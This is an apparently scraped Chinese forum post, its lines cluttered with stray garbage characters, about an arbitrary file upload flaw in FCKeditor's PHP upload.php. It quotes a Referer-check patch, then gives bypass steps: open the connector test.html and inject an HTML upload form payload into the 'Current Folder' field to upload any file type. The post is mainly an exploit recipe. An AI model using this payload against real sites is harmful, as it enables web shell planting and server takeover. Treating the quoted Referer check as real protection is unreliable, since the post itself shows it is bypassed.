漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
- R. Y4 U5 [# K1 k) y/ x网上给出的修复方案是
! k) ~! p ?; r- a2 e修复方法,删除FCK编辑器用其他的编辑器
6 f. v/ n# h9 ^/ j或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件) _# Q1 U0 g* H8 o1 T5 o
在
8 r- H3 a( L s; hrequire(‘config.php’);
8 Z8 V0 R" ?* k+ B& q0 Q, Arequire(‘util.php’);
$ h5 H8 y1 u! |6 l, g9 B的下面添加以下代码—————————–
7 N5 i S4 \7 K//防止外部提交4 Y6 }5 L# Z+ C# S" G5 c1 Z1 z
function outsidepost(): b( i. B$ O. {5 P; T
{* h# h6 o. ^0 o: ^' r+ F! ~
$servername=$_SERVER['SERVER_NAME'];
7 Q S, y7 K' s. _$ l" b9 ^$sub_from=@$_SERVER['HTTP_REFERER'];- o+ Z7 B4 N+ K! t
$sub_len=strlen($servername);
6 A. S5 I6 P+ h+ G$checkfrom=substr($sub_from,7,$sub_len);! d+ x% u, w4 L2 n2 \
if($checkfrom!=$servername){
2 _# C" w9 L- e( mecho(“you don’t outsidepost!”);
, u" ~ a, o0 a' a$ |exit;' y( x1 q+ a# X9 B. h% m- U8 d) o
}
& W, L. z" V+ s}
4 y5 t) i Z' qoutsidepost();
0 k) }- x) n4 E2 T! G; u/ ?防止外部提交,但是没有防止内部提交,: G. {) L' C- U8 M: Q3 ^, {
利用方法:' u) S2 t* G3 K& v c4 `5 j
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html- }; G) R# T& V# U
2,在Current Folder 框输入
6 p. x9 o- \ w2 [( w+ g: @<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
2 |3 m# l9 ^4 {, T9 h然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
8 y" p. J/ x& P$ fPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |